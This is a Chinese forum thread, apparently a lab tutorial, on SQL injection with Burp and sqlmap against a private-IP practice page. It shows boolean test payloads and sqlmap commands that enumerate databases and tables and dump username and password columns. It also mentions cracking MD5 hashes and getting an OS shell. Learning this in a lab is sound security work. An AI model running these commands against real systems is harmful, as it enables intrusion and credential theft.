搜索
查看: 3302|回复: 1

kali sqlmap post注入

[复制链接]

588

主题

862

帖子

2195

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2195

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-4-2 22:35:30 | 显示全部楼层 |阅读模式
SQL Inject漏洞测试流程 第一步:注入点探测自动方式:使用web漏洞扫描工具,自动进行注入点发现手动方式:手工构造sql inject测试语句进行注入点发现
第二步:信息获取通过注入点取期望得到的数据。
1.环境信息:数据库类型,数据库版本,操作系统版本,用户信息等。
2.数据库信息:数据库名称,数据库表,表字段,字段内容(加密内容破解)
第三步:获取权限 3 获取操作系统权限: 通过数据库执行shell,上传Shell


SQL Inject 漏洞-注入点类型-数字类型判断

测试提交:1 and 1=1 猜测SQL:select 字段名 from 表名 where id =1 and 1=1;
测试提交:1 and 1=2 猜测SQL:select 字段名 from 表名 where id =1 and 1=2;

开始测试

点击查询,然后我们利用burp抓包

将抓到的包全选复制,保存文件11.txt
并复制到sqlmap的根目录下/usr/share/sqlmap
开始测试
执行命令
./sqlmap.py -r "11.txt" 

这样就开始了sqlmap注入测试
获取数据库
./sqlmap -r "11.txt" --dbs



获取表

./sqlmap -r "11.txt" -D 数据库 --tables




获取表结构
./sqlmap.py -r "11.txt" -D 数据库 -T 表名 --columns




获取表内容
./sqlmap.py -r "11.txt" -D lou -T users -C "username,password" --dump




解密MD5



或者直接执行命令
sqlmap -u [url=http://192.168.123.129/vul/sqli/sqli_id.php]http://192.168.123.129/vul/sqli/sqli_id.php[/url] --data "id=*&submit=%E6%9F%A5%E8%AF%A2" --dbs

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

588

主题

862

帖子

2195

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2195

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
 楼主| 发表于 2019-4-2 22:36:44 | 显示全部楼层
漏洞平台下载安装 参考教程 https://bbskali.cn/forum.php?mod=viewthread&tid=1618
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表